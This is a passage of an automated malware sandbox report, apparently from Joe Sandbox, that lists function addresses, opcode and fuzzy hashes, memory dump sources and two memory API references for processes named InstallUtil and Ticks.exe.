Opcode ID: 4f5526697f91149f91b0ef856c7cba6753baf01ff650ba86e3163116d84619a6
Instruction ID: 86476c9e632e8ae273dbdd883f73f3f146b78af0e82ae84bbcf5654eb973128a
Opcode Fuzzy Hash: 4f5526697f91149f91b0ef856c7cba6753baf01ff650ba86e3163116d84619a6
Instruction Fuzzy Hash: 5131BB7147634A8FD2092F22A5AE17AFFB9FB0F32B7047D81F18B851559F3004848B60

Function 015CB879 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2519318325.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15c0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4abbfbc07515cb25ecda79cc14686d9a1000f76f9d672b6e92c10300b89fa774
Instruction ID: a2951d4ea1c85b798e5a97c26354a3cd31da4be4faee43b7153d318b7bae0ea1
Opcode Fuzzy Hash: 4abbfbc07515cb25ecda79cc14686d9a1000f76f9d672b6e92c10300b89fa774
Instruction Fuzzy Hash: 29310635B002098FDB55DFA8C491EEDBBB2FF88620F195445E505AF361DB31EC428BA1

Function 015CB8AD Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2519318325.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15c0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 233efe3ecae6800e602af1c1db01e43d042d8d8be5bc4663a5012a351fd35a3e
Instruction ID: f6893af393758b01907423ef5ec3eb348badf42263394a0c7112655eb304eef7
Opcode Fuzzy Hash: 233efe3ecae6800e602af1c1db01e43d042d8d8be5bc4663a5012a351fd35a3e
Instruction Fuzzy Hash: B0311735B002098FDB55DFA8C491EDDBBB2FF88220F194455E505AF361DB71EC428B91

Function 015CBE00 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2519318325.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15c0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1dc31af5102e5f9903eb90e22dd8f24bbcfeabd9138f0693d2fece8d3fb73a97
Instruction ID: d3a8a784ab697360a38e4d26192cbfaaee38da7d7bfa6fd967f106f34492bb35
Opcode Fuzzy Hash: 1dc31af5102e5f9903eb90e22dd8f24bbcfeabd9138f0693d2fece8d3fb73a97
Instruction Fuzzy Hash: D531C3347002099FDB09DFB8D855A6E7BB6FFC9640F24806AE5068F362DB319D55CB90

Function 015C18C8 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2519318325.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15c0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d35220433f5eba27b565f3bfb781f4d0e0298bba8c6f7b46b71c03d5bc10f68
Instruction ID: ec67d277a75568769d2ee64c021106842d6192bd488acbf62e0bfa765cdee1b6
Opcode Fuzzy Hash: 6d35220433f5eba27b565f3bfb781f4d0e0298bba8c6f7b46b71c03d5bc10f68
Instruction Fuzzy Hash: 16219035A00504DFCF24DF68D4809FE7BA5EB99760B20815DD90A9B345DB35EE06CBD1

Function 015CBC40 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2519318325.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15c0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a488392671f27af357e5cee4ebb78c2d556d107a1873355b4aca3ce6b073e7e
Instruction ID: 46260bed142882d00ce6f7b5bc85776dd3d67e127eaeb20d84fde8ae9b39c9ce
Opcode Fuzzy Hash: 8a488392671f27af357e5cee4ebb78c2d556d107a1873355b4aca3ce6b073e7e
Instruction Fuzzy Hash: 6E21D4357053468FCB166BB8D42A35D7FA6EFC6145B1405BEE549CF242DC358C028391

Function 015CBD19 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2519318325.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15c0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 048b4fb3605acb73ad63e42f5a78995e1490ac17d8fd861911aee6ab2a832343
Instruction ID: 81f73c0de57a6540828cc65a87ab2cbdb53af7b1ef75f80e1679676cf22dbe45
Opcode Fuzzy Hash: 048b4fb3605acb73ad63e42f5a78995e1490ac17d8fd861911aee6ab2a832343
Instruction Fuzzy Hash: DB215071A00109AFDB44EFB9D855AAE7BB6FF8C340F10406AE519DB255DB309E02CBA0

Function 0157D030 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2518678370.000000000157D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0157D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_157d000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb907c8e84e6b46c2538aaff2348a0dd022aef22793f5d0cdd8e812146840ceb
Instruction ID: b27195596729d0dd557b74f1a1fe718790e062f46a38e44b48c9565310467f71
Opcode Fuzzy Hash: bb907c8e84e6b46c2538aaff2348a0dd022aef22793f5d0cdd8e812146840ceb
Instruction Fuzzy Hash: 192100B1504200EFDB16DF64E981B26BBB1FF84314F24C96DE80A0F292D336D847CA62

Function 0157D006 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2518678370.000000000157D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0157D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_157d000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 81fe10125da2af498b0817b97485d0c4d3d1179b9e0a9639d8bdb61c812bfaaa
Instruction ID: 5613f69f58af03f33b162b7bd9431fedd180a5b2fccb797f30c76783fadd93bd
Opcode Fuzzy Hash: 81fe10125da2af498b0817b97485d0c4d3d1179b9e0a9639d8bdb61c812bfaaa
Instruction Fuzzy Hash: C0215C755093C09FCB13CF64D990B15BF71AF46214F29C5DBD8898F2A7D23A980ACB62

Function 015C0EC8 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2519318325.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15c0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 624e3648ec413782096236e0fca4a3eaca928314cbecbad30c1c7eb346bd5790
Instruction ID: 4c3be7fd52e9812f9b48f3f0e85b5aaf580a1b0e4a457367223926c0e7922178
Opcode Fuzzy Hash: 624e3648ec413782096236e0fca4a3eaca928314cbecbad30c1c7eb346bd5790
Instruction Fuzzy Hash: E0218C74E0021ADFDB48EFB8D4546AEBBB2FF89744F0088AEE8149F294CA745945CF51

Function 015C17B8 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2519318325.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15c0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e711c51958c47dd96e6b3fde563b1fe2f09bc8fb3aa15e8159c65c06ea056f0
Instruction ID: 2cb0c46be0b360d967f25a98a789be0a3a62f137bcd33f5663a038b7bb92d690
Opcode Fuzzy Hash: 1e711c51958c47dd96e6b3fde563b1fe2f09bc8fb3aa15e8159c65c06ea056f0
Instruction Fuzzy Hash: A621F270D05609CFDB05EFA8D8845EEBFF4EF4A200F0441AAD405BB225EB305A85CBA1

Function 015CBB60 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2519318325.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15c0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b3b546546df2a370a34bec333afb9c2f86048450d8c9a1df184ec73bfe8c0bd
Instruction ID: 27d45322e32422f48fd75945b24137ff5305b15b670f61da28119b48f9b94db2
Opcode Fuzzy Hash: 8b3b546546df2a370a34bec333afb9c2f86048450d8c9a1df184ec73bfe8c0bd
Instruction Fuzzy Hash: 4D116A353002048FD724DFA9D995A5AB7F6FF88B65B2084AAE54A8F371CA71EC05CB50

Function 015CBB31 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2519318325.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15c0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f22dc0294400975f466c6d7663e20f7afeb11416d155eb08cb1e8fcf12e7b27b
Instruction ID: b467a1dbdd88d0c361b13ff24e66038fac13bcdbf4e9628b4826a53dfc7389c8
Opcode Fuzzy Hash: f22dc0294400975f466c6d7663e20f7afeb11416d155eb08cb1e8fcf12e7b27b
Instruction Fuzzy Hash: FE118C317002048FCB34CFA9C999B9A77B6FF85B54F1484AEE14A8F261C6B1D805CB51

Function 015C4AE0 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2519318325.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15c0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 71ca8aeab77b2faa812e2148b8e5f433ab5102329ee7ea5403a16668baffb3e4
Instruction ID: 60d1e354e0d6bca1208c3392a7771a7db9299e816d596dc370fa357d561a888d
Opcode Fuzzy Hash: 71ca8aeab77b2faa812e2148b8e5f433ab5102329ee7ea5403a16668baffb3e4
Instruction Fuzzy Hash: 8401F532B043144FDB299FBDD854A2E7ADBEF89A58715443ED906CB255FE70CC028661

Function 015C4AF0 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2519318325.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15c0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca077f43d4f31ef3ad97d2499e95a9e0a9dc5aab9fa463c897d9470c189ca69c
Instruction ID: b3d67860d00e96c2412a825f6f14a05ca8a1fbb621b2b1001d5d6fa4cc07eee8
Opcode Fuzzy Hash: ca077f43d4f31ef3ad97d2499e95a9e0a9dc5aab9fa463c897d9470c189ca69c
Instruction Fuzzy Hash: 10018B32B042144FDB28AFBD9854A2E7ADBEFC8654714443ED506CB355FE70CC018651

Function 015CA518 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2519318325.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15c0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 712342b89ba00cc9c8beeaec1ca2602e34cefbdf2fa5bfc2f9e8239d743a0b99
Instruction ID: b783a0d8077361aa769cb2ed422aa30756ca1fbff9137aaa693a5c9483ec0adb
Opcode Fuzzy Hash: 712342b89ba00cc9c8beeaec1ca2602e34cefbdf2fa5bfc2f9e8239d743a0b99
Instruction Fuzzy Hash: F7014075A1020D9FCF159FA9E8596AEBFB9FB88214B50443AF95AD7240DF308D108BA1

Function 015CA509 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2519318325.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15c0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a8599d8d4f41cb9e5a66dffa5718192d556497fdedc7b8fa81dbd99332826787
Instruction ID: 52d94330b764a2c32ef3c5fb7a2b549730e567dc016bf83085cada82441df6d3
Opcode Fuzzy Hash: a8599d8d4f41cb9e5a66dffa5718192d556497fdedc7b8fa81dbd99332826787
Instruction Fuzzy Hash: BC01B171A1021D9FCF15DFA9E8549EFBFB9FB88710B00813AF999E7240DB3049108BA1

Function 015CBF10 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2519318325.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15c0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dea51c83214b6beabb422e62631c9f928952886a5cde7e3cbf9125789aaaa96f
Instruction ID: 0511f2c1db6c40ca00419639811ede76fdc4027095ee55fd46084cae1b648fca
Opcode Fuzzy Hash: dea51c83214b6beabb422e62631c9f928952886a5cde7e3cbf9125789aaaa96f
Instruction Fuzzy Hash: 72F04C367043044BCB096BB8AD1A17E3F97EBC9211B14441BF209C7381DF358C41C791

Function 015CBD90 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2519318325.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15c0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 838101a2be74892f6c97023677df38956f77af336483ef7527a9624d58fef0ca
Instruction ID: cd7babdf0164ed139ed7a8ee57ec74e54b9060ac58e17a6bfbbc30df8708e170
Opcode Fuzzy Hash: 838101a2be74892f6c97023677df38956f77af336483ef7527a9624d58fef0ca
Instruction Fuzzy Hash: D5F0FF72A00119AFCB44DFA9DC459BFBBF9FF88650B104069F519D7211DA3199118BA1

Function 015CC1C8 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2519318325.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15c0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91fc3a2f6085e26762e24049b458e91f65d968bb13be5a7efa6c70f9275baed1
Instruction ID: 3749ce083a113da4192a89e1ed73d124ca6ee8f293edf9b0d89654887bdaf4d6
Opcode Fuzzy Hash: 91fc3a2f6085e26762e24049b458e91f65d968bb13be5a7efa6c70f9275baed1
Instruction Fuzzy Hash: 4CF0A732B046155F87295AAEE42595EB7AAEFC5A61714007EE50DCB350CE72DC01C790

Function 015CB9F9 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2519318325.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15c0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c378a2cf9338da97c5c5a51efd2710bdd30a6f5ed2b1917b5f2976536359e004
Instruction ID: 63e37898cf5a4747032bf7ac84b4b1312e5a63e25be06aa93a390d45bc39e79c
Opcode Fuzzy Hash: c378a2cf9338da97c5c5a51efd2710bdd30a6f5ed2b1917b5f2976536359e004
Instruction Fuzzy Hash: B6F09675E01209AFCB60DFA9D9419EFBBF5FF58250704452AE105E7200E63155118BE2

Function 015C4551 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2519318325.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15c0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00905e30dbe70036bb11928ee9c1099d39062318ba547b628a0272930f992a7f
Instruction ID: 9b8fa7844c2c7446d3bd3a4f3f6f9a7357b992e688325bff046de1fe498e4cf3
Opcode Fuzzy Hash: 00905e30dbe70036bb11928ee9c1099d39062318ba547b628a0272930f992a7f
Instruction Fuzzy Hash: C3F012310353828FE3226F70B4AE62A7F70FF0B313B466C99D06ACA456EB711448DB51

Function 015CBA08 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2519318325.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15c0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 79c2b88a37ce7decda90fd93592e4e98f13cc77550148a385fe96ca5d58b9eb0
Instruction ID: a16f17ce7f445d9d23f6c921bf712cdca61b152e9a54a6c26d5e6bafabd8d53b
Opcode Fuzzy Hash: 79c2b88a37ce7decda90fd93592e4e98f13cc77550148a385fe96ca5d58b9eb0
Instruction Fuzzy Hash: E3F08271D002099F8B60EFA9D8409AFBBF9FB98250B40452AE509D7201E6709911CBE2

Function 015C8A8E Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2519318325.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15c0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 668067700387593c788fdee14b5c0fee476739a39395a917d1f899f205a9d5ef
Instruction ID: 3902de53a7d4e695fad75366c53d69ef3c710361c3e942b48abc8a194e818bbf
Opcode Fuzzy Hash: 668067700387593c788fdee14b5c0fee476739a39395a917d1f899f205a9d5ef
Instruction Fuzzy Hash: 38F06D3070410ACFE715DF9CD91876E7AA1FB48B14F04082ED506AF295CBF88C408BA1

Function 015C8A85 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2519318325.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15c0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 668067700387593c788fdee14b5c0fee476739a39395a917d1f899f205a9d5ef
Instruction ID: 3902de53a7d4e695fad75366c53d69ef3c710361c3e942b48abc8a194e818bbf
Opcode Fuzzy Hash: 668067700387593c788fdee14b5c0fee476739a39395a917d1f899f205a9d5ef
Instruction Fuzzy Hash: 38F06D3070410ACFE715DF9CD91876E7AA1FB48B14F04082ED506AF295CBF88C408BA1

Function 015C4560 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2519318325.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15c0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84a49a98bcd24ae3a8cc8a51ed9a6756e78fec137480a5615202f68ef680f466
Instruction ID: 482cd2dc33b6503eded80ba39aa2812a7646a590cf7ae8b97102f2b025ad1920
Opcode Fuzzy Hash: 84a49a98bcd24ae3a8cc8a51ed9a6756e78fec137480a5615202f68ef680f466
Instruction Fuzzy Hash: E3E099710323028FE2202B60B5AE63E7A75FB0B313B422C04A02EC9429AF701088AB54

Function 015C1877 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2519318325.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15c0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7936ec251394dbc6954376621bbd967860178c0e259467e1684f891bc7a1ceff
Instruction ID: f9623bb0af772bdc355096c19ce77fd09cd60513c84766b72a7734f875b00883
Opcode Fuzzy Hash: 7936ec251394dbc6954376621bbd967860178c0e259467e1684f891bc7a1ceff
Instruction Fuzzy Hash: 14E0DF31D152A64ECB16AFB49C944EEBF30EE93310B0946E7D4907A141EB30265EC762

Function 015C1888 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2519318325.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15c0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2422b886044430b13b1b1d6e7537853308c338a7a3eb1287f57f6f93351cbb83
Instruction ID: 68b981dd55f2722c944efb12c18af5cdb629a7f3dabfc29184164b6678de1295
Opcode Fuzzy Hash: 2422b886044430b13b1b1d6e7537853308c338a7a3eb1287f57f6f93351cbb83
Instruction Fuzzy Hash: 5FD05B31D2022A57CF14E7A5DC448DFFB78EED6321B544626D91437140FB703659C6E1

Function 015C46B1 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2519318325.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15c0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1813ebbbdd729cbe6c8502480efa23d2e0893575268f3ab3874c850f58f85b46
Instruction ID: b9532bb2f4ee016f89cafd36d9ba26ec31c5f571a95fc43cdb913a0d749c3e78
Opcode Fuzzy Hash: 1813ebbbdd729cbe6c8502480efa23d2e0893575268f3ab3874c850f58f85b46
Instruction Fuzzy Hash: 04B0127390C38813EF395730E61B3553B10DB66308F6854EF8853C15C9EB1AC002C210

Analysis Process: Ticks.exePID: 7824, Parent PID: 7772COMMON

Execution Graph

Execution Coverage:	12.6%
Dynamic/Decrypted Code Coverage:	95.5%
Signature Coverage:	0%
Total number of Nodes:	198
Total number of Limit Nodes:	13

Executed Functions

Function 06C71FAB Relevance: 4.4, Strings: 2, Instructions: 1912
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

/, xrefs: 06C73D1E
-={, xrefs: 06C73318

Memory Dump Source

Source File: 0000000C.00000002.1720871260.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6c70000_Ticks.jbxd

Similarity

API ID:
String ID: -={$/
API String ID: 0-3609865728
Opcode ID: 4bc7300f6c0f9385e5b768685c7501bf82f0cdb60cb697b99da9644c18a2dfdc
Instruction ID: 8f3f4123eb380713a9966e2269c80e70effa1b10040c51238dedfb14053796a2
Opcode Fuzzy Hash: 4bc7300f6c0f9385e5b768685c7501bf82f0cdb60cb697b99da9644c18a2dfdc
Instruction Fuzzy Hash: B413E37A601114AFDB468F94DC48E56BBB3FF8C310B1681E5E6099B236C736D9A1EF40

Function 06C7EF40 Relevance: 2.4, Strings: 1, Instructions: 1178COMMON

Download Yara Rule

Strings

4, xrefs: 06C7F915

Memory Dump Source

Source File: 0000000C.00000002.1720871260.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6c70000_Ticks.jbxd

Similarity

API ID:
String ID: 4
API String ID: 0-4088798008
Opcode ID: 5d70876282fe8cb9eafe44ad41e249d49da09a699f9b3148aac4def7069a5765
Instruction ID: 5608dd4c797c2bfe3cf972ff9b537879d91bc6d90aa193b7f91792e754e7bbc1
Opcode Fuzzy Hash: 5d70876282fe8cb9eafe44ad41e249d49da09a699f9b3148aac4def7069a5765
Instruction Fuzzy Hash: 0AB2F574A00218CFDB54DFA9C994BADB7B6FF88300F158199E915AB3A5CB70AD81CF50

Function 06C7AEA8 Relevance: .4, Instructions: 407COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1720871260.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6c70000_Ticks.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8e84d06a633f7a013caac6f5f890b70b2b000e20fc14d883d6d248428809f83
Instruction ID: 2bbb81ac5641b3f0ca7f7128eae553b5809ab7c532633adc3019496ead665c6c
Opcode Fuzzy Hash: f8e84d06a633f7a013caac6f5f890b70b2b000e20fc14d883d6d248428809f83
Instruction Fuzzy Hash: 4402E7B4E06218CFEBA4DF5AD884B9DB7B2FB89300F1081AAD50DA7254DB745E81CF51

Function 06C7AE9B Relevance: .4, Instructions: 403COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1720871260.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6c70000_Ticks.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f773536d18a9e1b7c31b4cbeac3fbcde4995492dcdb3ebca7007f361dbe1bc6
Instruction ID: 6e3422c3bf09cd0d7a4b274d5691625e9656bcefc0e6c33cccd432fe6de25318
Opcode Fuzzy Hash: 3f773536d18a9e1b7c31b4cbeac3fbcde4995492dcdb3ebca7007f361dbe1bc6
Instruction Fuzzy Hash: E802D8B4E06218CFEBA4DF5AD884B9DB7B2FB89300F1081AAD509A7354DB745E81CF51

Function 06C787E0 Relevance: .2, Instructions: 247COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1720871260.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6c70000_Ticks.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13dbb142dd1de358d752ec37125ced5fe96241ea38344133437c8edf886aa07e
Instruction ID: 606e2c7eaf6cd84335fcc0154a6a9ab291e31da1215a3ec698b482db7a50e4af
Opcode Fuzzy Hash: 13dbb142dd1de358d752ec37125ced5fe96241ea38344133437c8edf886aa07e
Instruction Fuzzy Hash: 06B1D4B0E06218CFEB94CFAAD948B9EB7F2FB89300F10816AD619A7255D7345D85CF41

Function 06C787D1 Relevance: .2, Instructions: 245COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1720871260.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6c70000_Ticks.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eec151f0691f12cb7b89072470a99ed7a9d1b083b11f9766c3a2291e4197f69e
Instruction ID: 7f07366cfb4f8ab3ba41b966677f11ba3e3f020c7aeda1cfb9c83c73d3739cd7
Opcode Fuzzy Hash: eec151f0691f12cb7b89072470a99ed7a9d1b083b11f9766c3a2291e4197f69e
Instruction Fuzzy Hash: 8FB1D5B0E06218CFEB94CFAAD948B9EB7F2FB89300F10816AD519A7255D7345E85CF41

Function 06E5D440 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,?,?), ref: 06E5D4B4

Memory Dump Source

Source File: 0000000C.00000002.1721651833.0000000006E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6e50000_Ticks.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 392e6f327ae66a4e0183b255304de6eb31d4d2bf5054fb0d720fab2e961ea486
Instruction ID: 06cb61e809ae664035fdb6a67b2e7572c78ec3d3235241c4e3528f80c6832d5d
Opcode Fuzzy Hash: 392e6f327ae66a4e0183b255304de6eb31d4d2bf5054fb0d720fab2e961ea486
Instruction Fuzzy Hash: 94112771D003089FDB20DFAAC840BDEFBF4EF48210F10842AD519A7240CB79A501CFA4

Function 06E5E428 Relevance: 1.3, APIs: 1, Instructions: 52memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(?,?,?,?), ref: 06E5E493

Memory Dump Source

Source File: 0000000C.00000002.1721651833.0000000006E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6e50000_Ticks.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: bb28e6c9a7360e5e9e838ece8ea6e06c0263e2b54409eeaca7b2df7191d0cf9a
Instruction ID: ea5f6f9955e536a9e9d8320a10da2b90e995a17f83db11712c91fe372b1e98e1
